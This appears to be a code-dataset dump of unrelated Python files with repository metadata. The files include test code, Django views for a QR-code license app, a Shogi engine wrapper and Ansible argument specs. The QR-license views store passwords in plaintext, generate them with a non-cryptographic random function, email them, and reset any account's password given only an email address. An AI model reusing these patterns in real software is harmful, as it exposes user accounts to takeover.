pipeline_finisher_executor.set_attributes(stage_record_preconditions=["${record:eventType() == 'no-more-data'}"])
s3_origin >> trash
s3_origin >= pipeline_finisher_executor
s3_origin_pipeline = builder.build().configure_for_environment(aws)
s3_origin_pipeline.configuration['shouldRetry'] = False
return s3_origin_pipeline
def delete_aws_objects(client, aws, s3_key):
# Clean up S3.
delete_keys = {'Objects': [{'Key': k['Key']}
for k in
client.list_objects_v2(Bucket=aws.s3_bucket_name, Prefix=s3_key)['Contents']]}
client.delete_objects(Bucket=aws.s3_bucket_name, Delete=delete_keys)
def execute_pipeline_and_get_output(sdc_executor, s3_origin, pipeline):
sdc_executor.add_pipeline(pipeline)
snapshot = sdc_executor.capture_snapshot(pipeline, start_pipeline=True).snapshot
output_records = snapshot[s3_origin].output
return output_records
| 46.84556
| 334
| 0.656556
| 1,539
| 12,133
| 4.925926
| 0.223522
| 0.050125
| 0.040628
| 0.049334
| 0.502308
| 0.45614
| 0.441367
| 0.397705
| 0.351801
| 0.311305
| 0
| 0.050808
| 0.193769
| 12,133
| 258
| 335
| 47.027132
| 0.724187
| 0.031979
| 0
| 0.26178
| 0
| 0.04712
| 0.359911
| 0.071111
| 0
| 0
| 0
| 0
| 0.005236
| 1
| 0.136126
| false
| 0.120419
| 0.020942
| 0
| 0.167539
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6b00216e5015b612b495eca186f46004bdc92b04
| 1,824
|
py
|
Python
|
test/test_storage.py
|
jrabasco/PyPasser
|
3cc6ecdfa9b5fe22f5a88c221517fe09d2df9db6
|
[
"MIT"
] | null | null | null |
test/test_storage.py
|
jrabasco/PyPasser
|
3cc6ecdfa9b5fe22f5a88c221517fe09d2df9db6
|
[
"MIT"
] | null | null | null |
test/test_storage.py
|
jrabasco/PyPasser
|
3cc6ecdfa9b5fe22f5a88c221517fe09d2df9db6
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3.4
__author__ = "Jeremy Rabasco"
import sys
import os
sys.path.append("..")
import unittest
from modules import storage
from modules.service import Service
from modules.database import Database
class TestStorage(unittest.TestCase):
def setUp(self):
self.service = Service()
self.database = Database()
open("test.service", "w+").close()
open("test.db", "w+").close()
def test_write_read_service(self):
self.service.service_name = "Hello"
self.service.username = "This"
self.service.password = "Works"
storage.write("test", self.service, "test.service")
service2 = Service()
storage.read("test", service2, "test.service")
self.assertEqual(service2.service_name, self.service.service_name)
self.assertEqual(service2.username, self.service.username)
self.assertEqual(service2.password, self.service.password)
def test_write_read_database(self):
self.database.add_service(Service())
self.database.add_service(Service())
self.database.name = "Hey"
storage.write("test", self.database, "test.db")
database2 = Database()
storage.read("test", database2, "test.db")
self.assertEqual(database2.name, self.database.name)
for i in range(len(self.database.services)):
self.assertEqual(database2.services[i].service_name, self.database.services[i].service_name)
self.assertEqual(database2.services[i].username, self.database.services[i].username)
self.assertEqual(database2.services[i].password, self.database.services[i].password)
def tearDown(self):
os.remove(os.getcwd() + "/test.service")
os.remove(os.getcwd() + "/test.db")
if __name__ == "__main__":
unittest.main()
| 35.076923
| 104
| 0.668311
| 215
| 1,824
| 5.553488
| 0.246512
| 0.100503
| 0.050251
| 0.065327
| 0.204355
| 0.058626
| 0.058626
| 0
| 0
| 0
| 0
| 0.008844
| 0.194079
| 1,824
| 52
| 105
| 35.076923
| 0.803401
| 0.010417
| 0
| 0.04878
| 0
| 0
| 0.077008
| 0
| 0
| 0
| 0
| 0
| 0.170732
| 1
| 0.097561
| false
| 0.073171
| 0.146341
| 0
| 0.268293
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6b04db30f6d56200725a9e9d3be9cbc67d645d65
| 2,074
|
py
|
Python
|
tests/python/unittest/test_tir_pass_inject_double_buffer.py
|
0xreza/tvm
|
f08d5d78ee000b2c113ac451f8d73817960eafd5
|
[
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | null | null | null |
tests/python/unittest/test_tir_pass_inject_double_buffer.py
|
0xreza/tvm
|
f08d5d78ee000b2c113ac451f8d73817960eafd5
|
[
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | 1
|
2020-07-29T00:21:19.000Z
|
2020-07-29T00:21:19.000Z
|
tests/python/unittest/test_tir_pass_inject_double_buffer.py
|
0xreza/tvm
|
f08d5d78ee000b2c113ac451f8d73817960eafd5
|
[
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | 1
|
2021-07-22T17:33:16.000Z
|
2021-07-22T17:33:16.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
from tvm import te
def test_double_buffer():
dtype = 'int64'
n = 100
m = 4
tx = te.thread_axis("threadIdx.x")
ib = tvm.tir.ir_builder.create()
A = ib.pointer("float32", name="A")
C = ib.pointer("float32", name="C")
ib.scope_attr(tx, "thread_extent", 1)
with ib.for_range(0, n) as i:
B = ib.allocate("float32", m, name="B", scope="shared")
with ib.new_scope():
ib.scope_attr(B.asobject(), "double_buffer_scope", 1)
with ib.for_range(0, m) as j:
B[j] = A[i * 4 + j]
with ib.for_range(0, m) as j:
C[j] = B[j] + 1
stmt = ib.get()
stmt = tvm.tir.ir_pass.InjectDoubleBuffer(stmt, 2)
stmt = tvm.tir.ir_pass.Simplify(stmt)
assert isinstance(stmt.body.body, tvm.tir.Allocate)
assert stmt.body.body.extents[0].value == 2
mod = tvm.IRModule({
"db" : tvm.tir.PrimFunc([A.asobject(), C.asobject()], stmt)
})
f = tvm.tir.transform.ThreadSync("shared")(mod)["db"]
count = [0]
def count_sync(op):
if isinstance(op, tvm.tir.Call) and op.name == "tvm_storage_sync":
count[0] += 1
tvm.tir.ir_pass.PostOrderVisit(f.body, count_sync)
assert count[0] == 4
if __name__ == "__main__":
test_double_buffer()
| 36.385965
| 74
| 0.655738
| 318
| 2,074
| 4.18239
| 0.430818
| 0.03609
| 0.02406
| 0.031579
| 0.065414
| 0.041353
| 0.028571
| 0.028571
| 0
| 0
| 0
| 0.019171
| 0.220347
| 2,074
| 56
| 75
| 37.035714
| 0.80334
| 0.362584
| 0
| 0.055556
| 0
| 0
| 0.085824
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 1
| 0.055556
| false
| 0.083333
| 0.055556
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6b2889ee02cbc2db0ebf9270a48b091ad3ca3b59
| 8,237
|
py
|
Python
|
core/views.py
|
Neelamegam2000/QRcode-for-license
|
a6d4c9655c5ba52b24c1ea737797557f06e0fcbf
|
[
"MIT"
] | null | null | null |
core/views.py
|
Neelamegam2000/QRcode-for-license
|
a6d4c9655c5ba52b24c1ea737797557f06e0fcbf
|
[
"MIT"
] | null | null | null |
core/views.py
|
Neelamegam2000/QRcode-for-license
|
a6d4c9655c5ba52b24c1ea737797557f06e0fcbf
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render, redirect
from django.conf import settings
from django.core.files.storage import FileSystemStorage,default_storage
from django.core.mail import send_mail, EmailMessage
from core.models import Document
from core.forms import DocumentForm
from django.contrib import messages
import os
import pyqrcode
import png
import random
import base64
import cv2
import numpy as np
import pyzbar.pyzbar as pyzbar
def home(request):
documents= Document.objects.all()
return render(request, 'home.html', { 'documents': documents })
"""def simple_upload(request):
if request.method == 'POST' and request.FILES['myfile']:
myfile = request.FILES['myfile']
fs = FileSystemStorage()
filename = fs.save(myfile.name, myfile)
uploaded_file_url = fs.url(filename)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
media_path = os.path.join(BASE_DIR,'media')
full_path=os.path.join(media_path,myfile.name)
qr=pyqrcode.create(uploaded_file_url)
filename_before=filename.rsplit(".")
filename1=filename_before[0]+".png"
s=qr.png(filename1,scale=6)
'''from fpdf import FPDF
pdf=FPDF()
pdf.add_page()
pdf.image(filename1,x=50,y=None,w=60,h=60,type="",link=uploaded_file_url)'''
return render(request, 'simple_upload.html', {
'uploaded_file_url': uploaded_file_url
})
return render(request, 'simple_upload.html')"""
def model_form_upload(request):
id=""
msg=""
if request.method == 'POST':
form = DocumentForm(request.POST, request.FILES,request.POST)
if form.is_valid():
form.save()
email=form.cleaned_data['Email']
document_count=Document.objects.values_list('document').count()
document_last=Document.objects.values_list('document')[document_count-1]
document_name=document_last[0]
print(email)
t=Document.objects.last()
num_list=['0','1','2','3','4','5','6','7','8','9']
password1=""
for i in range(0,8):
password1=password1+random.choice(num_list)
t.password=password1
print(type(document_name))
document_name1=document_name.encode('ascii')
document_encode=str(base64.b64encode(document_name1))
ax=document_encode[2:-1]
t.file_url=ax
print(ax)
t.save()
qr=pyqrcode.create(ax)
filename=document_name.rsplit(".")
filename1=filename[0].split("/")
filename2=filename1[1]+".png"
qr.png(filename2,scale=6)
"""mail=EmailMessage('QR',password1,'vmneelamegam2000@gmail.com',[email])
#mail.attach(filename2,filename2.content_type)
mail.send()"""
subject = 'QRcode scanner for license'
message = password1
email_from = settings.EMAIL_HOST_USER
recipient_list = [email, ]
mail=EmailMessage( subject, message, email_from, recipient_list )
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
mail.attach_file(os.path.join(BASE_DIR,filename2))
mail.send()
msg="your successfully uploaded"
return redirect('model_form_upload')
else:
form = DocumentForm()
return render(request, 'model_form_upload.html', {'form': form,'msg':msg})
def mypass(request):
m=""
if(request.POST.get("pswd")==request.POST.get("pswd3")):
user_data=Document.objects.filter(Email=request.POST.get("email"),password=request.POST.get("old_pswd")).update(password=request.POST.get("pswd"))
user_data1=Document.objects.filter(Email=request.POST.get("email"),password=request.POST.get("pswd"))
"""if(len_user_data==1):
userdata.password=request.POST.get("pswd")
return render(request,'mypass.html',{u:"you have change the password successfully"})
else:"""
c=0
if(user_data1):
subject = 'QRcode scanner for license'
message = "Password has succesfully changed"+" "+request.POST.get("pswd")
email_from = settings.EMAIL_HOST_USER
recipient_list = [request.POST.get("email"), ]
mail=EmailMessage( subject, message, email_from, recipient_list )
mail.send()
c=1
m="your password is changed succesfully"
elif(len(Document.objects.filter(Email=request.POST.get("email"),password=request.POST.get("old_pswd")))==0 and request.method=="POST"):
m="your email or password is incorrect"
else:
m=""
print(m)
return render(request,'mypass.html',{"m":m})
def user_req(request):
if("scanner" in request.POST and request.method=="POST"):
cap = cv2.VideoCapture(0+cv2.CAP_DSHOW)
font = cv2.FONT_HERSHEY_PLAIN
decodedObjects=[]
while decodedObjects==[]:
_, frame = cap.read()
decodedObjects = pyzbar.decode(frame)
for obj in decodedObjects:
points = obj.polygon
(x,y,w,h) = obj.rect
pts = np.array(points, np.int32)
pts = pts.reshape((-1, 1, 2))
cv2.polylines(frame, [pts], True, (0, 255, 0), 3)
cv2.putText(frame, str(obj.data), (50, 50), font, 2,
(255, 0, 0), 3)
id =obj.data.decode("utf-8")
cv2.imshow("QR Reader", frame)
key = cv2.waitKey(10) & 0xFF
if decodedObjects!=[] :
cv2.destroyAllWindows()
return render(request,"user_req.html",{"id":id})
if('proceed' in request.POST and request.method=="POST"):
userdata=Document.objects.filter(file_url=request.POST.get("id1")).filter(password=request.POST.get("password1"))
return render(request,"user_req.html",{"userdata":userdata})
return render(request,"user_req.html",)
def user(request):
return render(request,"user.html",)
def forget_pass(request):
msg=""
if(request.method=="POST"):
num_list=['0','1','2','3','4','5','6','7','8','9']
password1=""
for i in range(0,8):
password1=password1+random.choice(num_list)
user_data=Document.objects.filter(Email=request.POST.get("email")).update(password=password1)
subject = 'QRcode scanner for license Forget password'
message = "Password has succesfully changed"+" "+password1
email_from = settings.EMAIL_HOST_USER
recipient_list = [request.POST.get("email"), ]
mail=EmailMessage( subject, message, email_from, recipient_list )
mail.send()
if(user_data>0):
msg="your password is changed succesfully and mail sent"
elif(user_data==0):
msg="your email is incorrect or not found"
return render(request,"forget_pass.html",{"msg":msg})
def qrcode_miss(request):
msg=""
if(request.method=='POST' and Document.objects.filter(Email=request.POST.get('email'),password=request.POST.get('password1'))):
user_data=Document.objects.values_list('document').filter(Email=request.POST.get('email'),password=request.POST.get('password1'))
m=user_data[0][0]
p=m.split('/')
print(p)
t=p[1]
print(t)
subject = 'QRcode scanner for license'
message = "resend"
email_from = settings.EMAIL_HOST_USER
recipient_list = [request.POST.get('email'),]
mail=EmailMessage( subject, message, email_from, recipient_list )
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
k=os.path.join(BASE_DIR,t)
print(k)
mail.attach_file(k)
mail.send()
msg="your qrcode is sent to your email"
elif(request.method=='POST'and Document.objects.values_list('document').filter(Email=request.POST.get('email'),password=request.POST.get('password1')).count()==0):
msg="your email or password is incorrect"
return render(request,'qrcode_miss.html',{"msg":msg})
| 42.901042
| 167
| 0.617701
| 1,016
| 8,237
| 4.889764
| 0.20374
| 0.059783
| 0.064815
| 0.038245
| 0.466787
| 0.367552
| 0.298712
| 0.285427
| 0.285427
| 0.253019
| 0
| 0.020186
| 0.2422
| 8,237
| 191
| 168
| 43.125654
| 0.775713
| 0
| 0
| 0.223684
| 0
| 0
| 0.124964
| 0.003171
| 0.013158
| 0
| 0.000577
| 0
| 0
| 1
| 0.046053
| false
| 0.164474
| 0.098684
| 0.006579
| 0.210526
| 0.046053
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6b2cec5a2588f39302333a5f4dacaf75c507b16b
| 3,344
|
py
|
Python
|
backend/api/management/commands/create_testdb.py
|
INSRapperswil/nornir-web
|
458e6b24bc373197044b4b7b5da74f16f93a9459
|
[
"MIT"
] | 2
|
2021-06-01T08:33:04.000Z
|
2021-08-20T04:22:39.000Z
|
backend/api/management/commands/create_testdb.py
|
INSRapperswil/nornir-web
|
458e6b24bc373197044b4b7b5da74f16f93a9459
|
[
"MIT"
] | null | null | null |
backend/api/management/commands/create_testdb.py
|
INSRapperswil/nornir-web
|
458e6b24bc373197044b4b7b5da74f16f93a9459
|
[
"MIT"
] | null | null | null |
"""
Setup DB with example data for tests
"""
from django.contrib.auth.hashers import make_password
from django.contrib.auth.models import User, Group
from django.core.management.base import BaseCommand
from api import models
class Command(BaseCommand):
help = 'Setup DB with example data for tests'
def handle(self, *args, **options):
print('---- Creating Users ----')
User.objects.get_or_create(username='thomastest', password=make_password('imatestin'))
thomas = User.objects.get(username='thomastest')
User.objects.get_or_create(username='norbert', password=make_password('netzwerk'))
norbert = User.objects.get(username='norbert')
User.objects.get_or_create(username='stefan', password=make_password('helldesk'))
stefan = User.objects.get(username='stefan')
superuser = Group.objects.get(name='superuser')
superuser.user_set.add(thomas)
netadmin = Group.objects.get(name='netadmin')
netadmin.user_set.add(norbert)
support = Group.objects.get(name='support')
support.user_set.add(stefan)
print('---- Creating Inventory ----')
models.Inventory.objects.create(name='Example', hosts_file='web_nornir/nornir_config/example_config/hosts.yaml',
groups_file='web_nornir/nornir_config/example_config/groups.yaml', type=1)
models.Inventory.objects.create(name='INS Lab', hosts_file='web_nornir/nornir_config/inslab_config/hosts.yaml',
groups_file='web_nornir/nornir_config/inslab_config/groups.yaml', type=1)
print('---- Creating Job Templates ----')
models.JobTemplate.objects.create(name='hello_world', description='This prints a hello world',
file_name='hello_world.py', created_by_id=1)
models.JobTemplate.objects.create(name='Get CDP Neighbors', description='Lists all CDP neighbors',
file_name='get_cdp_neighbors.py', created_by_id=1)
models.JobTemplate.objects.create(name='Get Interfaces',
description='Gets brief information about all interfaces, sh ip int br',
file_name='get_interfaces.py', created_by_id=1)
models.JobTemplate.objects.create(name='Ping Device',
description='Pings a chosen network device and reports if reachable',
file_name='ping.py', variables=['target'], created_by_id=1)
models.JobTemplate.objects.create(name='Get Configuration', description='Gets all configuration from device',
file_name='get_configuration.py', created_by_id=1)
print('---- Creating Tasks ----')
models.Task.objects.create(name='Get Hello World', created_by_id=1, template_id=1, inventory_id=1)
models.Task.objects.create(name='Get CDP neighbors of INS lab', created_by_id=2, template_id=2, inventory_id=2)
models.Task.objects.create(name='Get interfaces of INS lab', created_by_id=2, template_id=3, inventory_id=2)
print('---- ALL DONE!! ----')
| 54.819672
| 121
| 0.62201
| 387
| 3,344
| 5.21447
| 0.284238
| 0.06442
| 0.084242
| 0.035679
| 0.433598
| 0.35332
| 0.247275
| 0.173935
| 0.173935
| 0.098612
| 0
| 0.006486
| 0.262261
| 3,344
| 60
| 122
| 55.733333
| 0.811512
| 0.010766
| 0
| 0
| 0
| 0
| 0.283333
| 0.061728
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023256
| false
| 0.093023
| 0.093023
| 0
| 0.162791
| 0.139535
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6b4af341d1bd006f2df5874fa788b8866cb5c77d
| 800
|
py
|
Python
|
venv/lib/python3.6/site-packages/ansible_collections/junipernetworks/junos/plugins/module_utils/network/junos/argspec/facts/facts.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | 1
|
2020-01-22T13:11:23.000Z
|
2020-01-22T13:11:23.000Z
|
venv/lib/python3.6/site-packages/ansible_collections/junipernetworks/junos/plugins/module_utils/network/junos/argspec/facts/facts.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | 12
|
2020-02-21T07:24:52.000Z
|
2020-04-14T09:54:32.000Z
|
venv/lib/python3.6/site-packages/ansible_collections/junipernetworks/junos/plugins/module_utils/network/junos/argspec/facts/facts.py
|
usegalaxy-no/usegalaxy
|
75dad095769fe918eb39677f2c887e681a747f3a
|
[
"MIT"
] | null | null | null |
#
# -*- coding: utf-8 -*-
# Copyright 2019 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
"""
The arg spec for the junos facts module.
"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
class FactsArgs(object):
""" The arg spec for the junos facts module
"""
def __init__(self, **kwargs):
pass
argument_spec = {
"gather_subset": dict(
default=["!config"], type="list", elements="str"
),
"config_format": dict(
default="text", choices=["xml", "text", "set", "json"]
),
"gather_network_resources": dict(type="list", elements="str"),
"available_network_resources": {"type": "bool", "default": False},
}
| 25.806452
| 74
| 0.60625
| 95
| 800
| 4.884211
| 0.705263
| 0.025862
| 0.043103
| 0.056034
| 0.137931
| 0.137931
| 0.137931
| 0.137931
| 0
| 0
| 0
| 0.014706
| 0.235
| 800
| 30
| 75
| 26.666667
| 0.743464
| 0.2775
| 0
| 0.133333
| 0
| 0
| 0.233929
| 0.091071
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0.066667
| 0.066667
| 0
| 0.266667
| 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
86346fa63b7971b7ad956846f8bc8dcc94175283
| 2,679
|
py
|
Python
|
server/cauth/views.py
|
mashaka/TravelHelper
|
8a216dd13c253e138f241187dee46e6e53281a7b
|
[
"MIT"
] | null | null | null |
server/cauth/views.py
|
mashaka/TravelHelper
|
8a216dd13c253e138f241187dee46e6e53281a7b
|
[
"MIT"
] | 3
|
2020-02-11T23:38:20.000Z
|
2021-06-10T19:10:53.000Z
|
server/cauth/views.py
|
mashaka/TravelHelper
|
8a216dd13c253e138f241187dee46e6e53281a7b
|
[
"MIT"
] | 1
|
2018-09-19T11:19:48.000Z
|
2018-09-19T11:19:48.000Z
|
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.contrib.auth.forms import AdminPasswordChangeForm, PasswordChangeForm, UserCreationForm
from django.contrib.auth import update_session_auth_hash, login, authenticate
from django.contrib import messages
from django.shortcuts import render, redirect
from social_django.models import UserSocialAuth
from django.http import HttpResponse
from django.shortcuts import get_object_or_404, redirect
from rest_framework.authtoken.models import Token
from app.methods import prepare_user
def get_token(request):
if request.user:
user = request.user
prepare_user(user)
token,_ = Token.objects.get_or_create(user=user)
url = "travel://?token=" + token.key + '&id=' + str(user.id)
else:
url = "travel://error"
response = HttpResponse(url, status=302)
response['Location'] = url
return response
@login_required
def get_facebook_token(request):
q = get_object_or_404(UserSocialAuth, user=request.user, provider='facebook')
return HttpResponse(str(q.extra_data))
def signup(request):
return render(request, 'signup.html')
@login_required
def home(request):
return render(request, 'home.html')
@login_required
def settings(request):
user = request.user
try:
github_login = user.social_auth.get(provider='github')
except UserSocialAuth.DoesNotExist:
github_login = None
try:
twitter_login = user.social_auth.get(provider='twitter')
except UserSocialAuth.DoesNotExist:
twitter_login = None
try:
facebook_login = user.social_auth.get(provider='facebook')
except UserSocialAuth.DoesNotExist:
facebook_login = None
can_disconnect = (user.social_auth.count() > 1 or user.has_usable_password())
return render(request, 'settings.html', {
'facebook_login': facebook_login,
'can_disconnect': can_disconnect
})
@login_required
def password(request):
if request.user.has_usable_password():
PasswordForm = PasswordChangeForm
else:
PasswordForm = AdminPasswordChangeForm
if request.method == 'POST':
form = PasswordForm(request.user, request.POST)
if form.is_valid():
form.save()
update_session_auth_hash(request, form.user)
messages.success(request, 'Your password was successfully updated!')
return redirect('password')
else:
messages.error(request, 'Please correct the error below.')
else:
form = PasswordForm(request.user)
return render(request, 'password.html', {'form': form})
| 31.892857
| 99
| 0.709966
| 312
| 2,679
| 5.942308
| 0.294872
| 0.04315
| 0.036677
| 0.040453
| 0.081985
| 0.048544
| 0
| 0
| 0
| 0
| 0
| 0.00464
| 0.195595
| 2,679
| 83
| 100
| 32.277108
| 0.855684
| 0
| 0
| 0.231884
| 0
| 0
| 0.086226
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086957
| false
| 0.15942
| 0.15942
| 0.028986
| 0.347826
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
865b48e5b6d60c2c5b81fb4b0a827e80f5502ece
| 4,482
|
py
|
Python
|
engine_wrapper.py
|
lidevelopers/Lishogi-Bot-1
|
5e669870930fe497e323324f36ccdbf5b04d26d3
|
[
"MIT"
] | null | null | null |
engine_wrapper.py
|
lidevelopers/Lishogi-Bot-1
|
5e669870930fe497e323324f36ccdbf5b04d26d3
|
[
"MIT"
] | 2
|
2021-06-28T11:09:19.000Z
|
2021-06-30T16:59:13.000Z
|
engine_wrapper.py
|
lidevelopers/Lishogi-Bot-1
|
5e669870930fe497e323324f36ccdbf5b04d26d3
|
[
"MIT"
] | 9
|
2021-06-28T08:06:08.000Z
|
2021-10-06T05:01:57.000Z
|
import os
import shogi
import backoff
import subprocess
from util import *
import logging
logger = logging.getLogger(__name__)
import engine_ctrl
@backoff.on_exception(backoff.expo, BaseException, max_time=120)
def create_engine(config, board):
cfg = config["engine"]
engine_path = os.path.realpath(os.path.join(cfg["dir"], cfg["name"]))
engine_type = cfg.get("protocol")
engine_options = cfg.get("engine_options")
commands = [engine_path]
if engine_options:
for k, v in engine_options.items():
commands.append("--{}={}".format(k, v))
silence_stderr = cfg.get("silence_stderr", False)
return USIEngine(board, commands, cfg.get("usi_options", {}), cfg.get("go_commands", {}), silence_stderr)
class EngineWrapper:
def __init__(self, board, commands, options=None, silence_stderr=False):
pass
def search_for(self, board, movetime):
pass
def first_search(self, board, movetime):
pass
def search(self, game, board, btime, wtime, binc, winc):
pass
def print_stats(self):
pass
def get_opponent_info(self, game):
pass
def name(self):
return self.engine.name
def report_game_result(self, game, board):
pass
def quit(self):
self.engine.kill_process()
def print_handler_stats(self):
pass
def get_handler_stats(self):
pass
class USIEngine(EngineWrapper):
def __init__(self, board, commands, options, go_commands={}, silence_stderr=False):
commands = commands[0] if len(commands) == 1 else commands
self.go_commands = go_commands
self.engine = engine_ctrl.Engine(commands)
self.engine.usi()
if options:
for name, value in options.items():
self.engine.setoption(name, value)
self.engine.isready()
def first_search(self, board, movetime):
best_move, _ = self.engine.go(board.sfen(), "", movetime=movetime)
return best_move
def search_with_ponder(self, game, board, btime, wtime, binc, winc, byo, ponder=False):
moves = [m.usi() for m in list(board.move_stack)]
cmds = self.go_commands
if len(cmds) > 0:
best_move, ponder_move = self.engine.go(
game.initial_fen,
moves,
nodes=cmds.get("nodes"),
depth=cmds.get("depth"),
movetime=cmds.get("movetime"),
ponder=ponder
)
else:
best_move, ponder_move = self.engine.go(
game.initial_fen,
moves,
btime=btime,
wtime=wtime,
binc=binc,
winc=winc,
byo=byo,
ponder=ponder
)
return (best_move, ponder_move)
def search(self, game, board, btime, wtime, binc, winc):
cmds = self.go_commands
moves = [m.usi() for m in list(board.move_stack)]
best_move, _ = self.engine.go(
game.initial_fen,
moves,
btime=btime,
wtime=wtime,
binc=binc,
winc=winc,
depth=cmds.get("depth"),
nodes=cmds.get("nodes"),
movetime=cmds.get("movetime")
)
return best_move
def stop(self):
self.engine.kill_process()
def print_stats(self, stats=None):
if stats is None:
stats = ['score', 'depth', 'nodes', 'nps']
info = self.engine.info
for stat in stats:
if stat in info:
logger.info("{}: {}".format(stat, info[stat]))
def get_stats(self, stats=None):
if stats is None:
stats = ['score', 'depth', 'nodes', 'nps']
info = self.engine.info
stats_str = []
for stat in stats:
if stat in info:
stats_str.append("{}: {}".format(stat, info[stat]))
return stats_str
def get_opponent_info(self, game):
name = game.opponent.name
if name:
rating = game.opponent.rating if game.opponent.rating is not None else "none"
title = game.opponent.title if game.opponent.title else "none"
player_type = "computer" if title == "BOT" else "human"
def report_game_result(self, game, board):
self.engine.protocol._position(board)
| 29.486842
| 109
| 0.566934
| 528
| 4,482
| 4.660985
| 0.206439
| 0.056887
| 0.026412
| 0.026006
| 0.422999
| 0.369768
| 0.323446
| 0.222267
| 0.201138
| 0.168631
| 0
| 0.00197
| 0.320616
| 4,482
| 151
| 110
| 29.682119
| 0.80624
| 0
| 0
| 0.471074
| 0
| 0
| 0.041499
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.173554
| false
| 0.07438
| 0.057851
| 0.008264
| 0.297521
| 0.024793
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
86798d0504dd04df9298eafb92e49de14fb4653a
| 3,804
|
py
|
Python
|
cloudferry/actions/prechecks/check_vmax_prerequisites.py
|
SVilgelm/CloudFerry
|
4459c0d21ba7ccffe51176932197b352e426ba63
|
[
"Apache-2.0"
] | 6
|
2017-04-20T00:49:49.000Z
|
2020-12-20T16:27:10.000Z
|
cloudferry/actions/prechecks/check_vmax_prerequisites.py
|
SVilgelm/CloudFerry
|
4459c0d21ba7ccffe51176932197b352e426ba63
|
[
"Apache-2.0"
] | 3
|
2017-04-08T15:47:16.000Z
|
2017-05-18T17:40:59.000Z
|
cloudferry/actions/prechecks/check_vmax_prerequisites.py
|
SVilgelm/CloudFerry
|
4459c0d21ba7ccffe51176932197b352e426ba63
|
[
"Apache-2.0"
] | 8
|
2017-04-07T23:42:36.000Z
|
2021-08-10T11:05:10.000Z
|
# Copyright 2016 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
